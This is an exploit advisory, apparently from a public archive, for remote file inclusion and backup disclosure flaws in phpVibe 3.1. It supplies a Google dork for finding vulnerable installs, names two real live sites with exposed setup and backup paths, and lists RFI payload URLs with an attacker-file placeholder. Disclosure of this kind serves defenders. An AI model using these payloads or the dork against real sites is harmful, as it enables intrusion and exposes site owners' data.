phpVibe version 3.1 suffers from backup disclosure and remote file inclusion vulnerabilities. Note that this advisory has site-specific information.
8321a96022167607085ba31a313219dc9dc3c829e85c70941136f0a602a06971
##########################################
# Exploit Title: phpVibe 3.1 Multiple Vulnerability
# Date: 2013-05-07
# Author: indoushka
# Software Link: http://phprevolution.com/
# Category: webapps/php
# Version: 3.1
# Price: 40€
# Google dork: "Powered by phpVibe v3.1"
##########################################
installation Application error message :
http://www.supervideo.org/setup/application/views/displays//install/step-3.php
Backups :
http://gasandfoodvideo.com/setup/application/views/displays/modules/backups/
RFI :
http://localhost/phpVibe/index.php?com_handler=[EV!L]
http://localhost/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L]
http://localhost/phpVibe/app/classes/language.php?lang=[EV!L]
http://localhost/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L]
http://localhost/phpVibe/app/classes/language.php?lang=[EV!L]